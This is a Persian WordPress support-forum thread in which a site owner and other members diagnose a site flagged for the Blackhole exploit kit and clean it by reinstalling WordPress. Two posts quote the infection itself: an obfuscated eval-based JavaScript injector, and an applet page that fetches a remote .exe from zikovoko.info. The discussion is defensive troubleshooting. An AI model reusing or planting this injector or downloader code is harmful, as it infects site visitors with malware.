رفتن به مطلب

سایت وردپرسی آلوده به exploit blackhole - exploit kit


Amir.

پست های پیشنهاد شده

سلام به عزیزان .

سایت دوستمون به ادرس

varannews.ir

ظاهرا دچار یه جور ویروس شده .

در تصویر پیوست شده اشکالی که آنتی ویروس نورتون بنده ازش میگیره رو قرار دادم

دوستان به سورس سایت یه نگاهی بندازند و بگن مشکل از کدوم کد هستش !

post-87-0-31497000-1356652621_thumb.jpg

لینک به ارسال

والا آنتی ویروس من پانداست دقیقا هم عین پانداست هیچی حالیش نیست :D

سرسری نگاه کردم توی سورس قالب یه سری دستورات جاوااسکریپت دیدم خلاصه بگید پاک کنه ببین حل میشه


<script>/*<![CDATA[*/try{window.document.body++}catch(gdsgsdg){dbshre=222;}
if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(0,1,98,96,27,31,92,104,93,112,100,93,103,110,41,94,93,109,63,103,92,101,94,104,111,106,58,114,78,92,94,70,90,103,96,31,31,91,105,95,112,31,34,85,43,84,33,116,7,4,0,1,98,96,109,88,101,94,108,35,32,51,6,3,4,116,24,94,102,110,92,24,116,7,4,0,1,93,105,94,108,101,94,104,111,37,111,107,99,111,92,32,27,54,100,93,106,90,103,96,23,107,107,93,56,30,96,109,110,107,49,39,40,103,96,91,97,90,110,106,99,113,94,40,94,102,101,40,103,114,112,95,39,98,111,100,100,32,26,114,96,92,109,98,56,30,41,41,42,34,23,96,94,99,98,95,108,54,33,44,39,40,32,26,110,107,113,101,95,56,30,111,98,94,111,95,50,42,42,43,103,112,52,98,96,96,95,97,110,53,40,40,41,106,115,50,104,104,109,100,107,97,104,104,53,88,90,108,105,103,108,108,94,53,113,96,107,98,92,100,99,97,109,115,53,95,97,93,94,96,101,51,101,95,97,107,50,38,43,43,39,40,41,106,115,50,108,104,106,53,39,51,32,56,55,38,97,95,108,92,100,93,55,28,36,50,5,2,3,120,4,1,2,96,112,101,91,109,99,106,101,24,98,96,109,88,101,94,108,35,32,115,6,3,4,0,110,90,108,27,93,24,54,26,95,102,91,110,103,96,101,108,39,93,109,92,89,109,95,64,99,93,102,95,105,107,32,32,99,97,105,89,102,95,34,32,51,95,40,110,92,108,58,110,111,105,97,91,111,111,92,32,32,109,109,90,31,37,33,99,107,108,105,52,42,38,101,94,94,100,88,108,104,102,116,92,38,92,105,104,38,101,112,115,98,37,96,109,103,103,30,33,52,96,41,106,108,114,102,96,37,100,94,96,111,52,31,38,43,43,39,40,41,106,115,30,51,95,40,110,107,113,101,95,41,109,97,108,99,93,96,100,98,110,116,52,31,97,99,95,91,93,103,33,54,93,38,108,110,116,99,93,39,110,106,103,53,32,42,34,50,94,39,109,111,112,100,94,40,107,102,107,98,110,100,102,102,54,33,92,89,107,104,102,112,107,93,32,53,97,37,107,109,115,103,92,38,109,105,107,52,31,41,33,54,93,38,108,95,111,56,108,109,108,100,89,109,109,95,35,30,111,98,94,111,95,31,37,33,44,39,40,32,35,54,93,38,108,95,111,56,108,109,108,100,89,109,109,95,35,30,96,94,99,98,95,108,32,38,34,40,40,41,33,36,50,5,2,3,4,91,103,92,111,104,92,102,109,40,98,92,108,62,102,96,100,93,103,110,110,57,113,77,91,98,69,89,102,95,35,30,90,104,94,116,30,33,84,42,88,37,89,105,106,96,101,92,60,98,100,99,92,33,96,36,50,5,2,3,120);s="";for(i=0;i-630!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}
z=s;e(s);}/*]]>*/</script>

لینک به ارسال

البته دوستان وارد ترن ولی نورتون به سایتش که بری تو این قسمت

http://safeweb.norton.com/

میتونی سایتت رو چک کنی -اروریم نمیده (منم نورتن دارم-در کل نورتون و آویرا خیلی گیرن ^_^ )

لینک به ارسال

سرسری نگاه کردم توی سورس قالب یه سری دستورات جاوااسکریپت دیدم خلاصه بگید پاک کنه ببین حل میشه

تو سورس قالب رو گشتم چیزی نیافتم با این کدی که شما دادین !

لینک به ارسال

من سایت رو باز کردم خطایی نگرفته.

توی گوگل وبمستر چیزی نوشته؟ اخطاری داده؟

لینک به ارسال
  • 2 ماه بعد...

بعد از 3 ماه هنوز رفع نشده؟!

قالب رو عوض کردیم . ظاهرا مشکلی نیست !

اما اخه تو قالب قبلی هم کد خاصی نبود !

لینک به ارسال

سلام برادر؛

اگر مشکلی در کنه وب‌سایت وجود داشته باشه، این پلاگین می‌تونه محل بروز مشکلات احتمالی رو شناسایی و اعلام کنه. یک سال پیش؛ مشکلی رو در بطن دیتابیس پیدا کرد که هیچ‌یک از پلاگین‌های معروف نتونسته بودند ردیابی‌اش کنند!

موفق باشی!

ویرایش شده توسط javadzarei
لینک به ارسال

اسکن کردم این شد نتیجه اش !

http://sitecheck.sucuri.net/results/varannews.ir/

http://www.siteadvisor.com/sites/varannews.ir

.

تو همه جا میگه سالمه به جز اینکه در بلک لیست مک آفی قرار داره !

Domain blacklisted by SiteAdvisor (McAfee): varannews.ir

لینک به ارسال

امروز که نورتون سایتم رو بست یک خطایی داد که وقتی خواستم محتوای سایتم رو ذخیره کنم تو محتوای ذخیره شده یک فایل بود به اسم jovf.html که محتوای داخلش این هست


<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Crvhufzdydidmvp</title>
</head>
<body>
<applet archive="jovf_data/TFnVcMv" code="olhQt">
<param name="hlbWvO" value="http://zikovoko.info/CZ9N4B0MQ2112Asw0LmJ6158Ru0II1Y0kb2M15Z2I0DOyy0axuW0waXW18eER0YYB10lS180ntPM05L9i00kQ20kyyO0k0N50a8JE05XpG0yTLE024Pb00VZS16IU10tsPY07HQb0gERP0uWbM0i4iL0dj9o0uk1q0jClR098GL0UGUp0z3Ez0WybY0MFnd04LvB0cKwN/RhjUGv2P6P.exe?o=1&h=12">
</applet>
</body></html>

آیا این یک نوع ویروسه یا نه

لینک به ارسال

درباره این مشکل با بخش پشتیبانی سرور تماس گرفتم اونا گفتن مشکل از قالبتونه قالب رو عوض کردم و قالب قبلی رو حذف کردم یک روز مشکلی نداشتم اما امروز دوباره مشکل اومد این بار وقتی میخواستم وارد صفحه لوگین بشم .

در ضمن یک سایتی هست به آدرس http://urlquery.net درست نمیدونم کار اصلیش چیه اما وقتی سایت رو بررسی میکنه در یک بخشی یکسری آدرس هست که نمیدونم چطوری فعال هستن و همشون یا فیلتر هستن یا توسط آنتی ویروس ها مسدود شدن و البته آدرسها دائما در حال تغییر هستن اگه امکان داره درباره این بخش یک توضیحی بدین

آدرس سایت مربوطه

لینک ها در این بخش هستن

Last 6 reports on ASN: AS24940 Hetzner Online AG

ویرایش شده توسط 3001.ir
لینک به ارسال

روی سرور سایتتون بدافزار افتاده

حالت ویروسی داره

لینک به ارسال

در ضمن به تازگی آدرس های این چنینی توسط گوگل وب مستر گزارش میشه آیا ربطی به این مسئله داره یا یه مورد دیگس

www.1.com/tag/55-incredible-architecture/index.html

لینک به ارسال

بنظر من بهتره بجز پوسته و بخشهایی که اختصاصی هست کلا وردپرس رو حذف کنید. سایتتون رو خالی کنید و بعد بدید مدیر سرور براتون اسکن کنه

لینک به ارسال

قبلا با مدیر سرور تماس گرفتم و اونا گفتن مشکل از قالبتونه و از انجمن های وردپرس مشکلتون رو حل کنین .

حالا اگه کلیه فایل های روی سرور رو پاک کنم مشکل خاصی پیش میاد یا نه

لینک به ارسال

اگر مشکل از وردپرس باشه با حذف و نصب دستی وردپرس و همچنین اسکن کدهای پوسته تون مشکل باید حل بشه.

اگر با اینکار بصورت مقطعی درست بشه و باز دوباره همین مشکل ایجاد بشه در سرورتون بدافزار افتاده

لینک به ارسال

دیروز صبح تمامی اطلاعات روی سرور رو پاک کردم ودوباره بروش دستی وردپرس رو نصب کردم و تا حالا مشکلی بوجود نیومده .

لینک به ارسال

به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

مهمان
ارسال پاسخ به این موضوع ...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

  تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

×
×
  • اضافه کردن...